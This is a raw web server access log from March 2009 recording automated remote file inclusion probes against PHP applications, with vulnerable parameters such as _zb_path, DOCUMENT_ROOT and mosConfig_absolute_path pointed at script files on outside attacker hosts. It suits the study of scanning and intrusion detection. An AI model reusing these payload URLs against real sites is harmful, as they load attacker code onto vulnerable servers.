220.95.212.45 - - [13/Mar/2009:05:01:19 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
202.125.46.29 - - [13/Mar/2009:05:01:27 -0500] "GET /logs/access_log.1216598400//atom.php5?page=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:01:33 -0500] "GET /logs/access_log.1218931200/phphtml.php?htmlclass_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:01:33 -0500] "GET /phphtml.php?htmlclass_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:01:33 -0500] "GET /logs/phphtml.php?htmlclass_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:01:50 -0500] "GET /logs/access_log.1214352000/phphtml.php?htmlclass_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:01:56 -0500] "GET /logs/access_log.1217808000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:02:20 -0500] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:02:21 -0500] "GET /logs/access_log.1215302400%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:02:23 -0500] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
77.221.130.2 - - [13/Mar/2009:05:02:41 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.221.130.2 - - [13/Mar/2009:05:02:41 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.221.130.2 - - [13/Mar/2009:05:02:41 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
78.40.226.135 - - [13/Mar/2009:05:02:59 -0500] "GET /logs/kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=VuLneRaBillTy? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:02:59 -0500] "GET /kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=VuLneRaBillTy? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:03:19 -0500] "GET /logs/access_log.1214956800%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:03:34 -0500] "GET /logs/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:03:36 -0500] "GET /logs/access_log.1217289600%20%20/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:03:36 -0500] "GET /?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:03:39 -0500] "GET //skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:03:40 -0500] "GET /logs/access_log.1209772800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:03:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:03:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:03:46 -0500] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:03:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:04:24 -0500] "GET /logs/access_log.1215302400%20/phphtml.php?htmlclass_path=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:04:28 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:04:28 -0500] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:04:29 -0500] "GET //skin/zero_vote/error.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:05:31 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:05:32 -0500] "GET //skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:05:32 -0500] "GET /logs/access_log.1209772800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.2 - - [13/Mar/2009:05:05:48 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [13/Mar/2009:05:05:48 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
77.221.130.2 - - [13/Mar/2009:05:05:48 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
211.202.2.220 - - [13/Mar/2009:05:05:51 -0500] "GET /logs/access_log.1212192000//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:05:05:53 -0500] "GET /logs/access_log.1217203200/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.15 - - [13/Mar/2009:05:05:57 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.221.130.15 - - [13/Mar/2009:05:05:57 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.221.130.15 - - [13/Mar/2009:05:05:57 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.221.130.15 - - [13/Mar/2009:05:05:58 -0500] "GET /logs/access_log.1216857600//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.15 - - [13/Mar/2009:05:05:58 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.15 - - [13/Mar/2009:05:05:58 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
80.67.26.159 - - [13/Mar/2009:05:06:15 -0500] "GET /logs/access_log.1217289600/?INCLUDE_FOLDER=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.40.226.135 - - [13/Mar/2009:05:07:23 -0500] "GET /logs/kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=Kenthu? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:07:23 -0500] "GET /kin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=Kenthu? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:07:58 -0500] "GET /logs/access_log.1212192000//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:08:03 -0500] "GET /logs/access_log.1211328000//skin/zero_vote/error.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:09:31 -0500] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:09:33 -0500] "GET /logs/access_log.1215302400%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:09:34 -0500] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:10:46 -0500] "GET /logs/access_log.1214956800%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:12:45 -0500] "GET /logs/access_log.1209772800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
77.221.130.17 - - [13/Mar/2009:05:13:18 -0500] "GET /logs/access_log.1216944000/poll/booth.php?include_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:05:13:18 -0500] "GET /poll/booth.php?include_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:05:13:18 -0500] "GET /logs/poll/booth.php?include_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:05:13:31 -0500] "GET /logs/access_log.1209772800%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:13:34 -0500] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:13:51 -0500] "GET /logs/access_log.1212192000%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:13:57 -0500] "GET /logs/access_log.1217116800%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:13:59 -0500] "GET /logs/access_log.1218153600%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:14:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:05:14:25 -0500] "GET /logs/access_log.1212192000%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.57 - - [13/Mar/2009:05:14:49 -0500] "GET /logs/access_log.1219104000/index.php?inc=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.813"
93.186.192.57 - - [13/Mar/2009:05:14:49 -0500] "GET /index.php?inc=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
93.186.192.57 - - [13/Mar/2009:05:14:49 -0500] "GET /logs/index.php?inc=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
220.95.212.45 - - [13/Mar/2009:05:15:03 -0500] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:03 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:04 -0500] "GET //index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:07 -0500] "GET /logs/access_log.1216684800/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:07 -0500] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:07 -0500] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:51 -0500] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:51 -0500] "GET //?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:15:53 -0500] "GET /logs//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 200 122044 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:16:02 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:05:16:44 -0500] "GET /include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:16:49 -0500] "GET /logs/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:16:53 -0500] "GET /logs/access_log.1217289600//index.php?DOCUMENT_ROOT=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:05:16:53 -0500] "GET /logs/access_log.1211328000/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
220.95.212.45 - - [13/Mar/2009:05:17:05 -0500] "GET /logs/access_log.1217289600/errors.php?error=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:05:17:32 -0500] "GET /include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:32 -0500] "GET /logs/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:32 -0500] "GET /logs/access_log.1211328000/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:17:41 -0500] "GET /index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:17:41 -0500] "GET /logs/access_log.1216944000%20%20/index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:17:41 -0500] "GET /logs/index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:44 -0500] "GET /include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:44 -0500] "GET /logs/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:44 -0500] "GET /logs/access_log.1211328000%20%20/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:48 -0500] "GET /include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:48 -0500] "GET /logs/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:05:17:48 -0500] "GET /logs/access_log.1211328000%20%20/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.222.129.18 - - [13/Mar/2009:05:17:57 -0500] "GET /logs/access_log.1219536000%20%20/index.php?redir=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.192.251.146 - - [13/Mar/2009:05:18:13 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:05:18:16 -0500] "GET /logs/access_log.1214956800%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:18:22 -0500] "GET /logs/access_log.1216684800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:18:32 -0500] "GET /?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:18:32 -0500] "GET /logs/access_log.1223251200/?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:18:35 -0500] "GET /logs/?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:05:18:39 -0500] "GET /logs/access_log.1226793600/?sourcedir=http://compraloenlinea.com.mx//includes/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:18:50 -0500] "GET /logs/access_log.1216684800//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:18:58 -0500] "GET /logs/access_log.1205366400//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:19:02 -0500] "GET /logs/access_log.1205366400//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:19:48 -0500] "GET /logs/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:19:48 -0500] "GET /include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:19:49 -0500] "GET /logs/access_log.1211328000/include/lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.40.226.135 - - [13/Mar/2009:05:20:05 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=Kenthu? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:20:06 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:21:06 -0500] "GET /logs/access_log.1212192000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:21:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:21:10 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
220.95.212.45 - - [13/Mar/2009:05:21:24 -0500] "GET /logs/access_log.1219536000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/gue/echo.swf??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
124.217.242.70 - - [13/Mar/2009:05:21:36 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
211.202.2.220 - - [13/Mar/2009:05:21:44 -0500] "GET //?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:21:44 -0500] "GET /logs/access_log.1215302400%20%20//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:05:21:45 -0500] "GET /logs//?_zb_path=http://gumansin.com/id.txt?? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:05:22:09 -0500] "GET /logs/access_log.1217030400%20%20/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:05:22:09 -0500] "GET /logs/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.220.195.71 - - [13/Mar/2009:05:22:09 -0500] "GET /index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.182.137.218 - - [13/Mar/2009:05:23:04 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:05:23:04 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.820"
211.220.195.71 - - [13/Mar/2009:05:23:09 -0500] "GET /logs/access_log.1216944000%20%20/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.137.218 - - [13/Mar/2009:05:23:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.820"
207.182.137.218 - - [13/Mar/2009:05:23:14 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://vis1.uuuq.com/na-id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.820"
67.192.251.146 - - [13/Mar/2009:05:23:15 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:05:23:15 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:05:23:16 -0500] "GET /logs//?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122044 "-""libwww-perl/5.805"
67.192.251.146 - - [13/Mar/2009:05:23:16 -0500] "GET //?path%5Bdocroot%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
78.40.226.135 - - [13/Mar/2009:05:23:39 -0500] "GET /logs/access_log.1217289600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:23:40 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
78.40.226.135 - - [13/Mar/2009:05:23:40 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=VuLneRaBillTy? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
202.125.46.29 - - [13/Mar/2009:05:24:01 -0500] "GET /logs/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:24:01 -0500] "GET /index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.125.46.29 - - [13/Mar/2009:05:24:01 -0500] "GET /logs/access_log.1216944000/index.php?redir=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
